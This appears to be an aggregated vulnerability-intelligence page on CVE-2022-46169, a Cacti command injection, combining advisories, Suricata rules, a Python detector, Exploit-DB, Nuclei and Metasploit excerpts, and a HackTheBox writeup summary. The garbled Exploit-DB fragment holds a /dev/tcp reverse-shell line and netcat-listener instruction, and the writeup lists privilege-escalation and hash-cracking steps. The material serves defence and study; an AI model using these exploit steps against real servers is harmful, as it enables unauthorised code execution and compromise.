CVE-2022-46169
Published: 2022-12-05
Priority P197 · critical · CVSS 3.1: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, due 2023-03-09
Exploited in the wild
EPSS: 99.83% (100.0th percentile)
Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users. In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device.

The vulnerability resides in the `remote_agent.php` file, which can be accessed without authentication. Its authorization check retrieves the IP address of the client via `get_client_addr` and resolves this IP address to the corresponding hostname via `gethostbyaddr`. It then verifies that an entry exists in the `poller` table whose hostname corresponds to the resolved hostname. If such an entry is found, the function returns `true` and the client is authorized.

This authorization can be bypassed because of how `get_client_addr` is implemented. The function is defined in the file `lib/functions.php` and checks several `$_SERVER` variables to determine the IP address of the client. The variables beginning with `HTTP_` can be arbitrarily set by an attacker. Since there is a default entry in the `poller` table with the hostname of the server running Cacti, an attacker can bypass the authentication e.g. by providing the header `Forwarded-For: `. This way the function `get_client_addr` returns the IP address of the server running Cacti. The following call to `gethostbyaddr` will resolve this IP address to the hostname of the server, which will pass the `poller` hostname check because of the default entry.

After the authorization of the `remote_agent.php` file is bypassed, an attacker can trigger different actions. One of these actions is called `polldata`. The called function `poll_for_data` retrieves a few request parameters and loads the corresponding `poller_item` entries from the database. If the `action` of a `poller_item` equals `POLLER_ACTION_SCRIPT_PHP`, the function `proc_open` is used to execute a PHP
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cacti | cacti | < 1.2.23 | 1.2.23 |
| cacti | cacti | >= 0 < 1.2.16+ds1-2+deb11u1 | 1.2.16+ds1-2+deb11u1 |
| cacti | cacti | >= 0 < 1.2.22+ds1-3 | 1.2.22+ds1-3 |
| cacti | cacti | >= 0 < 1.2.22+ds1-3 | 1.2.22+ds1-3 |
| cacti | cacti | >= 0 < 1.2.22+ds1-3 | 1.2.22+ds1-3 |
| debian | cacti | < cacti 1.2.22+ds1-3 (bookworm) | cacti 1.2.22+ds1-3 (bookworm) |
CVSS provenance
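| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| osv | | 9.8 | CRITICAL | |
| vulncheck | | 9.8 | CRITICAL | |
| cisa | | 9.8 | CRITICAL | |
| vendor_debian | | 9.8 | CRITICAL | |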
OSV
CVE-2022-46169: Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users
osv·2022-12-05·CVSS 9.8
CVE-2022-46169 [CRITICAL] CVE-2022-46169: Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users
VulnCheck
Cacti Command Injection Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-46169 [CRITICAL] CWE-74 Cacti Command Injection Vulnerability
Cacti contains a command injection vulnerability that allows an unauthenticated user to execute code.
Affected: Cacti Cacti
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.linkedin.com/posts/the-shadowserver-foundation_unauthenticated-command-injection-activity-7017511524604764160-qaje/; https://www.bleepingcomputer.com/news/security/hackers-exploit-cacti-critical-bug-to-install-malware-open-reverse-shells/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.fortinet.com/blog/threat-research/moobot-strikes-again-targeting-cacti-and-realtek-vulnerabilities; https://unit42.paloaltonetworks.com/network-security-trends-nov-jan/; https://information.rapid7.com/rs/
Ubuntu
Cacti vulnerability
vendor_ubuntu·2025-01-23
CVE-2022-46169 Cacti vulnerability
Title: Cacti vulnerability
Summary: Cacti could be made to crash or run programs if it received
specially crafted network traffic.
It was discovered that Cacti did not properly sanitize the 'poller_id'
parameter in the "remote_agent.php" file. A remote attacker could
possibly use this issue to achieve remote code execution.
Instructions: In general, a standard system update will make all the necessary changes.
CISA
Cacti Command Injection Vulnerability
cisa·2023-02-16·CVSS 9.8
CVE-2022-46169 [CRITICAL] CWE-74 Cacti Command Injection Vulnerability
Vulnerability: Cacti Command Injection Vulnerability
Affected: Cacti Cacti
Cacti contains a command injection vulnerability that allows an unauthenticated user to execute code.
Required Action: Apply updates per vendor instructions.
Notes: https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf; https://nvd.nist.gov/vuln/detail/CVE-2022-46169
Remediation Due Date: 2023-03-09
Debian
CVE-2022-46169: cacti - Cacti is an open source platform which provides a robust and extensible operatio...
vendor_debian·2022·CVSS 9.8
CVE-2022-46169 [CRITICAL] CVE-2022-46169: cacti - Cacti is an open source platform which provides a robust and extensible operatio...
Suricata
ET EXPLOIT Possible Cacti Unauthenticated RCE Inbound M2 (CVE-2022-46169)
suricata·2022-12-26·CVSS 9.8
CVE-2022-46169 [CRITICAL] ET EXPLOIT Possible Cacti Unauthenticated RCE Inbound M2 (CVE-2022-46169)
Rule:
```
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Cacti Unauthenticated RCE Inbound M2 (CVE-2022-46169)"; flow:established,to_server; http.method; content:"GET"; http.header_names; to_lowercase; content:"|0d 0a|x-forwarded-for|0d 0a|"; http.uri.raw; content:"/remote_agent.php?"; content:"action=polldata"; content:"local_data_ids|5b 5d 3d|"; fast_pattern; content:"host_id="; content:"poller_id|3d|"; pcre:"/^(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/Ri"; reference:url,github.com/taythebot/CVE-2022-46169; reference:cve,2022-46169; classtype:attempted-admin; sid:2043011; rev:2; metadata:attack_target Server, created_at 2022_12_26, cve CVE_2022_461
```
Suricata
ET EXPLOIT Possible Cacti Unauthenticated RCE Inbound M1 (CVE-2022-46169)
suricata·2022-12-26·CVSS 9.8
CVE-2022-46169 [CRITICAL] ET EXPLOIT Possible Cacti Unauthenticated RCE Inbound M1 (CVE-2022-46169)
Rule:
```
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Cacti Unauthenticated RCE Inbound M1 (CVE-2022-46169)"; flow:established,to_server; http.method; content:"GET"; http.header_names; to_lowercase; content:"|0d 0a|x-forwarded-for|0d 0a|"; http.uri; content:"/remote_agent.php?"; content:"action=polldata"; content:"local_data_ids|5b 5d 3d|"; fast_pattern; content:"host_id="; content:"poller_id|3d|"; pcre:"/^(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/Ri"; reference:url,github.com/taythebot/CVE-2022-46169; reference:cve,2022-46169; classtype:attempted-admin; sid:2043010; rev:2; metadata:attack_target Server, created_at 2022_12_26, cve CVE_2022_46169,
```
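For sites that only have captured request heads rather than a Suricata sensor, the conditions of the two rules above can be checked offline. The following is an added example, not code from this page or from the rule authors; the triage levels, the function names and the sample requests are assumptions made for illustration, and the header set covers the two header names this page mentions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Client-address headers named on this page: the advisory text mentions
# Forwarded-For; the Suricata rules match X-Forwarded-For.
SPOOFABLE_HEADERS = {"forwarded-for", "x-forwarded-for"}
# Same test as the rules' pcre: poller_id begins with ` ; | & or with
# one of < > $ followed by "(", raw or percent-encoded.
POLLER_INJECT = re.compile(
    r"(?:^|&)poller_id=(?:[`;|&]|%60|%3b|%7c|%26|(?:[<>$]|%3c|%3e|%24)(?:\(|%28))",
    re.IGNORECASE,
)
POLLDATA_PARAMS = {"local_data_ids[]", "host_id", "poller_id"}


def parse_request(raw):
    """Split a raw HTTP request head into (method, target, headers)."""
    lines = raw.replace("\r\n", "\n").split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def classify(raw):
    """Return 'alert', 'review' or 'ok' for one request (hypothetical triage levels)."""
    method, target, headers = parse_request(raw)
    url = urlsplit(target)
    if method != "GET" or not url.path.endswith("/remote_agent.php"):
        return "ok"
    spoofed = bool(headers.keys() & SPOOFABLE_HEADERS)
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes keys
    polldata = params.get("action") == ["polldata"] and params.keys() >= POLLDATA_PARAMS
    if spoofed and polldata and POLLER_INJECT.search(url.query):
        return "alert"  # every condition of the Suricata rules holds
    # A client-supplied address header on this endpoint is what the advisory's
    # authorization bypass depends on, so surface it even without a payload.
    return "review" if spoofed else "ok"


# Constructed sample requests (placeholder host, address and payload text).
HEAD = "GET /cacti/remote_agent.php?action=polldata&local_data_ids[]=6&host_id=1&poller_id="
SUSPECT = HEAD + "%3bPLACEHOLDER HTTP/1.1\r\nHost: cacti.example\r\nX-Forwarded-For: 192.0.2.10\r\n\r\n"
PROXIED = HEAD + "1 HTTP/1.1\r\nHost: cacti.example\r\nX-Forwarded-For: 192.0.2.10\r\n\r\n"
DIRECT = HEAD + "1 HTTP/1.1\r\nHost: cacti.example\r\n\r\n"

if __name__ == "__main__":
    for name, raw in (("SUSPECT", SUSPECT), ("PROXIED", PROXIED), ("DIRECT", DIRECT)):
        print(name, classify(raw))
```

A reverse proxy in front of Cacti adds `X-Forwarded-For` to legitimate traffic, which is why a header on its own is graded `review` rather than `alert`.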
Exploit-DB
Cacti v1.2.22 - Remote Command Execution (RCE)
exploitdb·2023-03-31·CVSS 9.8
CVE-2022-46169 [CRITICAL] Cacti v1.2.22 - Remote Command Execution (RCE)
---
# Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)
# Exploit Author: Riadh BOUCHAHOUA
# Discovery Date: 2022-12-08
# Vendor Homepage: https://www.cacti.net/
# Software Links : https://github.com/Cacti/cacti
# Tested Version: 1.2.2x /dev/tcp/{self.rs_host}/{self.rs_port} None:
# Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL
args = parse_args()
e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port)
e.exploit()
if __name__ == "__main__":
main()
Nuclei
Cacti <=1.2.22 - Remote Command Injection
nuclei·CVSS 9.8
CVE-2022-46169 [CRITICAL] Cacti <=1.2.22 - Remote Command Injection
Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
Template:
```yaml
id: CVE-2022-46169

info:
  name: Cacti <=1.2.22 - Remote Command Injection
  author: Hardik-Solanki,j4vaovo
  severity: critical
  description: |
    Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote a
```
Metasploit
Cacti 1.2.22 unauthenticated command injection
metasploit·CVSS 9.8
CVE-2022-46169 [CRITICAL] Cacti 1.2.22 unauthenticated command injection
This module exploits an unauthenticated command injection vulnerability in Cacti through 1.2.22 (CVE-2022-46169) in order to achieve unauthenticated remote code execution as the www-data user. The module first attempts to obtain the Cacti version to see if the target is affected. If LOCAL_DATA_ID and/or HOST_ID are not set, the module will try to bruteforce the missing value(s). If a valid combination is found, the module will use these to attempt exploitation. If LOCAL_DATA_ID and/or HOST_ID are both set, the module will immediately attempt exploitation. During exploitation, the module sends a GET request to /remote_agent.php with the action parameter set to polldata and the X-Forwarded-For header set to the provided value for X_FORWARDED_FO
Unit42
Network Security Trends: November 2022-January 2023
blogs_unit42·2023-05-02·CVSS 9.8
CVE-2021-22005 [CRITICAL] Network Security Trends: November 2022-January 2023
## Network Security Trends: November 2022-January 2023
Yiheng An
Published: May 2, 2023
Unit42
Network Security Trends: November 2022-January 2023
blogs_unit42·2023-05-02
Network Security Trends: November 2022-January 2023
## Executive Summary
Recent observations of exploits used in the wild November 2022-January 2023 reveal that attackers have been using newly published remote code execution vulnerabilities in the following three products:
- Roxy-WI, a web interface for managing and monitoring RoxyDNS
- CWP, a free web hosting control panel (aka Control Web Panel or CentOS Web Panel)
- Cacti, an open-source network monitoring and graphing tool used to track the performance of various network devices, servers and applications
Additionally, attackers have also been taking advantage of a traversal and information disclosure vulnerability in ThoughtWorks GoCD to read sensitive files stored on servers.
In our observations of network security trends, Unit 42 researchers have pinpointed several attacks based o
Fortinet
Moobot Strikes Again - Targeting Cacti And RealTek Vulnerabilities | FortiGuard Labs
blogs_fortinet·2023-03-29·CVSS 9.8
[CRITICAL] Moobot Strikes Again - Targeting Cacti And RealTek Vulnerabilities | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Moobot Strikes Again - Targeting Cacti And RealTek Vulnerabilities
By Cara Lin | March 29, 2023
Affected platforms: Windows, Linux
Impacted parties: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity level: Critical
FortiGuard Labs observed several attacking bursts targeting Cacti and Realtek vulnerabilities in January and March of this year and then spreading ShellBot and Moobot malware. (Figure 1 shows trigger counts from our IPS signatures of the CVE-2021-35394 (Realtek) and CVE-2022-46169 (Cacti) vulnerabilities.)
ShellBot is a malware developed in Perl that uses the Internet Relay Chat (IRC) protocol to communicate with the server, also known as PerlBot. Moobot is a Mirai variant botnet that targets exposed net
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
CTF
MonitorsTwo / README
ctf_writeups·CVSS 6.3
CVE-2022-46169 [MEDIUM] MonitorsTwo / README
# MonitorsTwo - HackTheBox - Writeup
Linux, 20 Base Points, Easy
## Machine
## TL;DR
To solve this machine, we start by using `nmap` to enumerate open services and find ports `22`, and `80`.
***User***: Found `Cacti Version 1.2.22` and used `CVE-2022-46169` to acquire a reverse shell as `www-data`. Discovered the SUID file `capsh` and gained a root shell inside the container using `capsh --gid=0 --uid=0 --`. Found the `/entrypoint.sh` file containing the database (DB) credentials. Identified the hashed password of `marcus` in the DB. Successfully cracked the hash using `john` and employed the obtained password to establish an SSH connection as `marcus`.
***Root***: Based on an email received from `administrator@monitorstwo` addressed to `marcus` it is indicated that the vulnerabili
- https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216
- https://github.com/Cacti/cacti/commit/a8d59e8fa5f0054aa9c6981b1cbe30ef0e2a0ec9
- https://github.com/Cacti/cacti/commit/b43f13ae7f1e6bfe4e8e56a80a7cd867cf2db52b
- https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-46169
- 2022-12-05: Published
- 2023-02-16: Added to CISA KEV
- Exploited in the wild